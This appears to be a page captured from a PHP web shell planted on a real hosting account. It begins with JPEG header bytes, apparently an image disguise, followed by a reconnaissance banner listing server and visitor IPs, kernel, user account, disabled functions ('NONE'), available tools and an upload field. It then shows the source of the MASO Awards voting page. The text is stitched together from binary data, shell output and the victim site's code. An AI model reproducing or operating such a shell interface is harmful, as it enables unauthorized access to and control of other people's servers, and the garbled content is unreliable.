����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 13.58.103.70 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/maso-awards.live/ |
Upload File : |
<?php header('location:remarks'); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="./css/icomoon/style.css"> <link rel="stylesheet" href="./css/bootstrap.min.css"> <link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet"> <link rel="stylesheet" href="./css/main.css"> <link rel="stylesheet" href="./css/animate.css" type="text/css"> <link rel="shortcut icon" href="./assets/img/maso.png" type="image/png"> <link href="assets/css/style.css" rel="stylesheet"> <script src="./js/countdown.js"></script> <script src="./js/jquery-3.3.1.min.js"></script> <title>Maso Awards - Vote</title> <!--og codes--> <meta property="og:url" content="https://www.maso-awards.com/nominate.php" /> <meta property="og:type" content="website" /> <meta property="og:title" content="<?php echo "MASO AWARDS " . date('Y'); ?>" /> <meta property="og:image" content="https://maso-awards.live/assets/img/maso-og.jpg" /> <meta property="og:description" content="Vote" /> <meta property="fb:app_id" content="197362031139140" /> <style> .side-menu a:hover { background-color: #000; color: #fff; } </style> </head> <body> <div class="vote"> <!-- Background --> <div class="bg"> <!-- EMPTY HTML WRAPPER --> <div id="timer"></div> </div> <div class="timer-overlay"></div> <div class="container-fluid"> <!-- Categories --> <div class="categories row d-flex justify-content-center"> <?php include './php/connect.php'; include './php/timer.php'; $query1 = "SELECT * FROM `categories` ORDER BY `sort` ASC"; if ($run1 = mysqli_query($conn, $query1)) { $count = 1; while ($row = mysqli_fetch_array($run1)) { if ($count % 2 == 0) { ?> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-duration="1.5s" data-wow-delay="0.5s"> <a href="category/<?php echo $row['hiphen']; ?>" target="_parent" class="black"><?php echo $row['category']; ?></a> </div> <?php } else { ?> <div class="col-lg-4 col-md-6 wow fadeInUp" data-wow-duration="1.5s" data-wow-delay="0.5s"> <a href="category/<?php echo $row['hiphen']; ?>" target="_parent" class="gold"><?php echo $row['category']; ?></a> </div> <?php } ?> <?php ++$count; } } else { die(mysqli_error($conn)); } ?> </div> </div> <div class="container-fluid footer-menu"> <div class="row"> <div class="col text-center"> <div class="d-flex justify-content-around"> <a href="home" class="mx-2"> <i class="fas fa-home icon"></i> <div>Home</div> </a> <a href="vote" class="mx-2 active"> <i class="fas fa-th-list icon"></i> <div>Categories</div> </a> <a href="buy-ticket" class="mx-2"> <i class="fas fa-ticket-alt icon"></i> <div>Tickets</div> </a> <a href="donate" class="mx-2"> <i class="fas fa-hand-holding-heart icon"></i> <div>Donate</div> </a> </div> </div> </div> </div> <!-- ======= Footer ======= --> <footer id="footer"> <div class="footer-top"> <div class="container-fluid"> <div class="row"> <div class="col-lg-4 col-md-6 footer-links"> <h4>Useful Links</h4> <ul> <li><i class="bi bi-chevron-right"></i> <a href="#">About Us</a></li> <li><i class="bi bi-chevron-right"></i> <a href="#hotels">News</a></li> <li><i class="bi bi-chevron-right"></i> <a href="buy-ticket">Buy Ticket</a></li> <li><i class="bi bi-chevron-right"></i> <a href="#">Vote</a></li> </ul> </div> <div class="col-lg-4 col-md-6 footer-info"> <img src="assets/img/maso.png" alt="TheEvenet"> </div> <div class="col-lg-4 col-md-6 footer-contact"> <h4>Contact Us</h4> <p> Chichiri<br> Blantyre<br> Malawi <br> <strong>Phone:</strong> +265 884 41 21 72 / +265 994 61 91 94<br> <strong>Email:</strong> info@maso-awards.live<br> </p> <div class="social-links"> <a href="#" class="twitter"><i class="bi bi-twitter"></i></a> <a href="#" class="facebook"><i class="bi bi-facebook"></i></a> <a href="#" class="instagram"><i class="bi bi-instagram"></i></a> <a href="#" class="google-plus"><i class="bi bi-instagram"></i></a> <a href="#" class="linkedin"><i class="bi bi-linkedin"></i></a> </div> </div> </div> </div> </div> <div class="container"> <div class="copyright"> © Copyright <strong>MASO Awards</strong>. All Rights Reserved </div> </div> </footer><!-- End Footer --> <div class="footer-tolerance"></div> </div> <!-- ATTACH COUNTDOWN TIMER --> <script> window.addEventListener("load", function() { // 27 days = 27 X 24 X 60 X 60 = 2419200 secs counter.init("timer", <?php echo $actual; ?>); }); //Disable specific keyboard shortcuts document.addEventListener('keydown', (e) => { if (e.ctrlKey && (e.key === 'u' || e.key === 'U' || e.key === 'i' || e.key === 'I')) { e.preventDefault(); } }); // Disable right-click context menu document.addEventListener('contextmenu', function(event) { event.preventDefault(); }); </script> </body> <script src="./js/all.min.js"></script> <script src="./js/wow.min.js"></script> <script src="./js/bootstrap.min.js"></script> <script type="text/javascript"> new WOW().init(); </script> </html>